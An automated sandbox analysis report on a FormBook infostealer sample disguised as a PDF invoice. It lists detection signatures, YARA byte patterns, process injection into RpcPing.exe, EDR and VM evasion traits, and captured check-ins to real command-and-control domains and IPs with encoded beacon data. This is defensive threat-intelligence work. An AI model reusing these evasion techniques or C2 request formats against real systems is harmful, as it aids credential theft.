Edit tour

Windows Analysis Report
ORIGINAL INVOICE COAU7230734298.pdf.exe

Overview

General Information

Sample name:	ORIGINAL INVOICE COAU7230734298.pdf.exe
Analysis ID:	1523775
MD5:	7d3ee1a73d9fbef171c785801ffcaff2
SHA1:	2ad9a95c9038e4d61c6d9cbee63746454454d502
SHA256:	1897d47010a97079de62b957827fbecbdb4690ead4a51417fa6f1dccfc19f6c5
Tags:	exeuser-ngokoptmp
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ORIGINAL INVOICE COAU7230734298.pdf.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" MD5: 7D3EE1A73D9FBEF171C785801FFCAFF2)

ORIGINAL INVOICE COAU7230734298.pdf.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" MD5: 7D3EE1A73D9FBEF171C785801FFCAFF2)

ORIGINAL INVOICE COAU7230734298.pdf.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" MD5: 7D3EE1A73D9FBEF171C785801FFCAFF2)

fFUkGixTNm.exe (PID: 3492 cmdline: "C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

RpcPing.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)

fFUkGixTNm.exe (PID: 4248 cmdline: "C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 8104 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x27c3e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xff0d:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13c9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x79699:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x61968:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ed03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16fd2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13c9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x27c3e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xff0d:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13c9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13c9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: ORIGINAL INVOICE COAU7230734298.pdf.exe PID: 7276	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ed03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16fd2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2df03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x161d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe", CommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe", CommandLine|base64offset|contains: N !, Image: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe, NewProcessName: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe, OriginalFileName: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe", ProcessId: 7276, ProcessName: ORIGINAL INVOICE COAU7230734298.pdf.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T02:06:28.163634+0200	2855464	1	A Network Trojan was detected	192.168.2.4	56825	85.159.66.93	80	TCP
2024-10-02T02:06:30.710433+0200	2855464	1	A Network Trojan was detected	192.168.2.4	56826	85.159.66.93	80	TCP
2024-10-02T02:06:33.257293+0200	2855464	1	A Network Trojan was detected	192.168.2.4	56827	85.159.66.93	80	TCP
2024-10-02T02:06:41.993230+0200	2855464	1	A Network Trojan was detected	192.168.2.4	56829	185.106.176.204	80	TCP
2024-10-02T02:06:44.549267+0200	2855464	1	A Network Trojan was detected	192.168.2.4	56830	185.106.176.204	80	TCP
2024-10-02T02:06:47.089054+0200	2855464	1	A Network Trojan was detected	192.168.2.4	56831	185.106.176.204	80	TCP
2024-10-02T02:06:56.491974+0200	2855464	1	A Network Trojan was detected	192.168.2.4	56833	52.223.13.41	80	TCP
2024-10-02T02:06:58.051773+0200	2855464	1	A Network Trojan was detected	192.168.2.4	56834	52.223.13.41	80	TCP
2024-10-02T02:07:00.520885+0200	2855464	1	A Network Trojan was detected	192.168.2.4	56835	52.223.13.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe	Virustotal: Detection: 38%			Perma Link
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Joe Sandbox ML: detected

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Source: C:\Windows\SysWOW64\RpcPing.exe

Code function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose,

8_2_0327C000

Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 4x nop then xor eax, eax	8_2_03269B70
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 4x nop then mov ebx, 00000004h	8_2_03D304DE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 4x nop then pop edi	9_2_058C2FA0
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 4x nop then xor eax, eax	9_2_058C7839
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 4x nop then pop edi	9_2_058D2ACE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56830 -> 185.106.176.204:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56834 -> 52.223.13.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56825 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56835 -> 52.223.13.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56827 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56833 -> 52.223.13.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56829 -> 185.106.176.204:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56831 -> 185.106.176.204:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56826 -> 85.159.66.93:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.kartal-nakliyat.xyz

Source: Joe Sandbox View

IP Address: 52.223.13.41 52.223.13.41

Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
Source: Joe Sandbox View	ASN Name: AS_LYREG3FR AS_LYREG3FR

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeHost: www.yippie.worldUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeHost: www.kartal-nakliyat.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeHost: www.sidqwdf.funUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeHost: www.resellnexa.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)

Source: global traffic	DNS traffic detected: DNS query: www.yippie.world
Source: global traffic	DNS traffic detected: DNS query: www.kartal-nakliyat.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sidqwdf.fun
Source: global traffic	DNS traffic detected: DNS query: www.resellnexa.shop

Source: unknown

HTTP traffic detected: POST /n8ew/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeCache-Control: max-age=0Content-Length: 199Content-Type: application/x-www-form-urlencodedHost: www.kartal-nakliyat.xyzOrigin: http://www.kartal-nakliyat.xyzReferer: http://www.kartal-nakliyat.xyz/n8ew/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)Data Raw: 2d 4c 3d 56 70 73 65 45 75 30 4c 65 37 53 74 58 78 4b 66 4e 68 69 6b 35 6e 78 2b 2b 5a 67 49 52 53 78 43 53 64 69 4f 52 38 32 56 76 6d 47 48 76 65 4f 33 70 42 54 37 52 58 63 2b 63 39 76 54 69 6f 4f 45 78 70 2f 55 6d 4c 69 4b 71 35 71 69 64 56 46 56 45 67 64 62 34 4c 51 74 4c 44 6b 6d 37 4b 50 46 55 71 32 62 31 37 45 4d 62 67 79 6b 77 35 38 42 74 4b 2f 33 49 51 32 75 54 50 31 52 56 7a 38 2b 47 63 44 6e 48 54 6c 4a 73 32 71 64 41 31 62 4f 6a 77 75 57 39 4c 69 46 33 47 50 6b 32 4a 6b 67 72 59 2f 6a 59 5a 64 68 35 6f 75 2b 6d 61 45 61 55 4e 71 4d 41 78 79 4c 6b 67 43 64 7a 51 4f 6b 72 51 3d 3d Data Ascii: -L=VpseEu0Le7StXxKfNhik5nx++ZgIRSxCSdiOR82VvmGHveO3pBT7RXc+c9vTioOExp/UmLiKq5qidVFVEgdb4LQtLDkm7KPFUq2b17EMbgykw58BtK/3IQ2uTP1RVz8+GcDnHTlJs2qdA1bOjwuW9LiF3GPk2JkgrY/jYZdh5ou+maEaUNqMAxyLkgCdzQOkrQ==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 02 Oct 2024 00:06:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-10-02T00:06:39.8601907Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 